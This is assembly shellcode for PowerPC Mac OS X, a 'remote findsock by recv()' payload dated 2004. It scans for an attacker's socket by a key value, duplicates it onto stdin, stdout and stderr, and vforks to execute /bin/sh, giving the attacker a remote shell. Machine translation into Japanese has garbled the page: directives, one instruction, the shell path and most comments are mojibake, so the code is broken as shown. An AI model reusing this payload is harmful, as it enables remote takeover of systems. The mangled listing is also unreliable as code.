Osx/ppc - remote findsock by recv() ½ÅÍ×¤Ê shellcode

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
;;;
;;; PowerPC OSX remote findsock by recv() ½ÅÍ×¤Ê shellcode
;;;
;;; Dino Dai Zovi < ddz@theta44.org >, 20040816
;;;

.globl _shellcode
.text

.»Ï¤á¤ë¡¤·è¤á¤ë KEY, 0x5858580a
.»Ï¤á¤ë¡¤·è¤á¤ë PTHREAD_EXIT, 0x90017021	; OSX 10.3.X

_shellcode:
Lfindsock:
	addis	r27, 0, hi16(KEY)
	ori	r27, r27, lo16(KEY)
	addis	r31, 0, hi16(0xffff0000)
	srawi	r31, r31, 11
	mtctr	r31

	;; Count Éé¤«¤¹¡¿·âÄÆ¤¹¤ë sockets backwards in hopes of getting our most ºÇ¶á¤Î
	;; ´Ø·¸ (if we have Â¿½Å¤Î).
L0:	mfctr	r3
	addi	r3, r3, -1	; r3 = socket ¤È¤¸¹þ¤ß¡¿Äó½Ð¤¹¤ë descriptor

	addi	r4, r1, -4	; r4 = stack ¾×·â¤òÏÂ¤é¤²¤ë¤â¤Î
	sub	r5, r1, r4	; r5 = 4
	li	r6, 0x4140
	srawi	r6, r6, 7	; r6 = MSG_PEEK | MSG_DONTWAIT
	addi	r7, r5, -4	; r7 = 0
	addi	r8, r5, -4	; r8 = 0
	li	r30, 0x3aff
	srawi	r0, r30, 9	; ÉéÃ´ syscall number into r0
	cmplw	r29, r29

	.long	0x44ffff02	; recvfrom(s, buf, 4, 0x82, 0, 0)
	bdnzt	eq, L0
	;; On syscall error, »î¤ß¤ë¡¿´ë¤Æ¤ë compare anyway and ÃèÊÖ¤êÈô¹Ô
	
	lwz	r28, -4(r1)
	cmplw	r28, r27
	bdnzf	eq, L0
	;;; At this point our socket fd is in ctr

;;;
;;; dup2(2) our socket (in ctr) to stdin, stdout, stderr
;;; 	
Ldup_fds:
	li	r30, 0x2d01
	srawi	r0, r30, 7
	li	r30, 0x666
	srawi	r30, r30, 9
	
	mfctr	r3
	addi	r4, r30, -1
	.long	0x44ffff02	; dup2(sock, 2)
	.long	0x7c842008
	
	mfctr	r3
	addi	r4, r30, -2
	.long	0x44ffff02	; dup2(sock, 1)
	.long	0x7c842008	
	
	mfctr	r3
	addi	r4, r30, -3
	.long	0x44ffff02	; dup2(sock, 0)
	.long	0x7c842008

;;;
;;; VForking shellcode - Call vfork() and ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ë /ÃùÂ¢½ê/sh in child ²áÄø.  
;;; In parent, we exec "/ÃùÂ¢½ê/si" ("/ÃùÂ¢½ê/sh" + 1), fail, and run the code that 
;;; follows the execve().
;;;
Lfork_execve_binsh:
        ;; call vfork (necessary to exec in threaded programs)
	li	r30, 0x42ff
	srawi	r0, r30, 8 
	.long	0x44ffff02
	.long	0x7c842008

 	xor	r31, r31, r31
 	lis	r30, 0x2f2f
 	addi	r30, r30, 0x7367
	ÄÉ²Ã¤¹¤ë	r30, r30, r4	; In child, $r4 should be Ìµ
 	lis	r29, 0x2f62
 	addi	r29, r29, 0x696e
	xor	r28, r28, r28
	addi	r27, r1, -12
 	stmw	r27, -12(r1)	; -12 is ÆÈÃÇÅª¤Ê null-eliding constant

 	addi	r4, r1, -12
	addi	r3, r1, -4
 	xor	r5, r5, r5
 	li	r30, 30209
 	srawi	r0, r30, 9	; r0 = 59
 	.long	0x44ffff02	; execve(path, argv, NULL)
Lparent:

;;;
;;; Call pthread_exit in parent ²áÄø
;;;
Lpthexit:
	addis	r31, 0, hi16(PTHREAD_EXIT) ; pthread_exit
	ori	r31, r31, lo16(PTHREAD_EXIT)
	mtctr	r31
	bctrl